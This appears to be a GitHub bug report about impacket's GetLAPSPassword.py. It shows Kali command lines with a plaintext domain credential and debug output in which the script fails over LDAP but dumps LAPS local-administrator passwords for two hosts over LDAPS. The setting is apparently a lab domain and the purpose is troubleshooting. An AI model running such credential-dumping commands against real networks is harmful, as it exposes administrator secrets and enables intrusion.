Open
Description
Configuration
impacket version: v0.12.0
Python version: 3.12.8
Target OS: Windows Server 2025 Datacenter
Attacking OS: Kali
Debug Output With Command String
┌──(kali㉿kali)-[~/tools/impacket/examples]
└─$ ./GetLAPSPassword.py -dc-ip 192.168.116.131 'juicy.local/account_reader:P@ssw0rd' -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Connecting to 192.168.116.131, port 389, SSL False
[+] Total of records returned 5
[-] No LAPS data returned
┌──(kali㉿kali)-[~/tools/impacket/examples]
└─$ ./GetLAPSPassword.py -dc-ip 192.168.116.131 'juicy.local/account_reader:P@ssw0rd' -debug -ldaps
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Connecting to 192.168.116.131, port 636, SSL True
[+] Total of records returned 5
[+] Connecting to ncacn_ip_tcp:192.168.116.131[49689]
[+] Connected
[+] Successfully bound
[+] Calling MS-GKDI GetKey
Host        LAPS Username  LAPS Password   LAPS Password Expiration  LAPSv2
----------  -------------  --------------  ------------------------  ------
ADCS-2025$  laps_admin     hp$R/UVbP}6t5r  2025-02-20 14:52:44       True
WKSTN1$     laps_admin     S(X9m@2X+-M1H;  2025-02-20 14:15:54       True
Additional context
I suspect Microsoft added some security measure that only allows LAPS password retrieval over LDAPS. I slightly modified the example script to have a switch to default to LDAPS just to demonstrate the issue. I believe this issue is the same on the latest dev version of impacket.